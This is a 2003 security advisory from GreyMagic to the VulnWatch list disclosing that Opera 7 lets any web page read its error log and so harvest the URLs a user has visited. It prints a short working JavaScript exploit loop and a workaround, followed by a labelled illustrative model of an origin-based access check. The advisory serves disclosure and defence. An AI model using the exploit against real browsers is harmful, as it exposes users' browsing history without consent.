[VulnWatch] Sniffing Opera's Tracks (GM#006-OP)

From: GreyMagic Software (security@greymagic.com)
Date: 02/04/03

    From: GreyMagic Software <security@greymagic.com>
    To: "vulnwatch@vulnwatch.org" <vulnwatch@vulnwatch.org>
    Date: Tue, 04 Feb 2003 11:14:26 "GMT"
    
    

    GreyMagic Security Advisory GM#006-OP
    =====================================

    By GreyMagic Software, Israel.
    04 Feb 2003.

    Available in HTML format at http://security.greymagic.com/adv/gm006-op/.

    Topic: Sniffing Opera's Tracks.

    Discovery date: 29 Jan 2003.

    Affected applications:
    ======================

    Opera 7 (final).

    Introduction:
    =============

    Opera recently released a new version of its browser.

    The new browser features a very useful Javascript console, which uses a few
    methods Opera implemented in the "opera" object.

    Discussion:
    ===========

    These methods appear in the comments of the "console.html" file as follows:

    * opera.errorIndex():
    Returns the index of the last error message. This index is monotonically
    increasing (which limits us to about 2^53 errors per Opera session).

    * opera.errorMessage(i):
    Returns the error message at index i. The value returned may be #f, if that
    message has been flushed from the cache.

    Opera hadn't bothered to restrict these methods to certain credentials and
    they are available for any web page to use. At first glance this doesn't
    appear to be a big deal, but a short inspection of the generated error
    messages reveals that each of them contains the URL that threw the
    exception.

    In practice, this means that a web page can extract a list of all URLs the
    user had visited and that threw any exceptions. And since Opera pretends to
    be Internet Explorer by default, it often encounters errors in web pages.
    Harvesting visited URLs had never been this simple.

    Exploit:
    ========

    The following code will generate a list of visited URLs:

    var sMsg,
        sFinal = "",
        iLen = opera.errorIndex();

    for (var iErr = 0; iErr < iLen; iErr++) {
        sMsg = opera.errorMessage(iErr);
        if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal += RegExp.$1 + "\n";
    }
    alert(sFinal);

    Demonstration:
    ==============

    A proof-of-concept demonstration of this issue is available at
    http://security.greymagic.com/adv/gm006-op/.

    Solution:
    =========

    Until a patch becomes available, disable Javascript by going to: File ->
    Preferences -> Multimedia, and uncheck the "Enable JavaScript" item.

    Tested on:
    ==========

    Opera 7 NT4.
    Opera 7 Win98.
    Opera 7 Win2000.
    Opera 7 WinXP.

    Disclaimer:
    ===========

    The information in this advisory and any of its demonstrations is provided
    "as is" without warranty of any kind.

    GreyMagic Software is not liable for any direct or indirect damages caused
    as a result of using the information or demonstrations provided in any part
    of this advisory.

    Feedback:
    =========

    Please mail any questions or comments to security@greymagic.com.

    - Copyright 2003 GreyMagic Software.
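
Added example, not part of the GreyMagic advisory and not Opera's code: a JavaScript model of the access check the Discussion section says is missing, where the error-log accessors only return entries from the caller's own origin unless the caller is the console page. ErrorLog, CONSOLE_URL, the callerUrl parameter and the sample URLs are assumptions made for illustration; only the names errorIndex and errorMessage come from the advisory.

```javascript
// Hypothetical identifier for the privileged console page (assumption).
const CONSOLE_URL = "opera:console";

// Origin of a URL, or null when it cannot be parsed.
function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

class ErrorLog {
  constructor() { this.entries = []; }

  // Called by the browser core when a script loaded from sourceUrl throws.
  record(sourceUrl, text) {
    this.entries.push({ origin: originOf(sourceUrl), message: sourceUrl + ": " + text });
  }

  // The console sees everything; a web page sees only its own origin's errors.
  // Opaque origins (serialized as "null") never match anything.
  canRead(callerUrl, entry) {
    if (callerUrl === CONSOLE_URL) return true;
    const origin = originOf(callerUrl);
    return origin !== null && origin !== "null" && origin === entry.origin;
  }

  visibleTo(callerUrl) {
    return this.entries.filter((e) => this.canRead(callerUrl, e));
  }

  // The count is filtered too, so the index itself does not reveal how
  // many errors other sites produced during the session.
  errorIndex(callerUrl) {
    return this.visibleTo(callerUrl).length;
  }

  errorMessage(callerUrl, i) {
    const visible = this.visibleTo(callerUrl);
    return Number.isInteger(i) && i >= 0 && i < visible.length ? visible[i].message : null;
  }
}

// Constructed sample session: three errors from two sites.
function sampleLog() {
  const log = new ErrorLog();
  log.record("https://shop.example/cart", "document.all is undefined");
  log.record("https://news.example/story?id=3", "x is not a function");
  log.record("https://shop.example/checkout", "syntax error");
  return log;
}
```

With this check in place, the loop in the Exploit section run from an unrelated page gets an index of 0 and no messages, while the console page still sees the full log.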


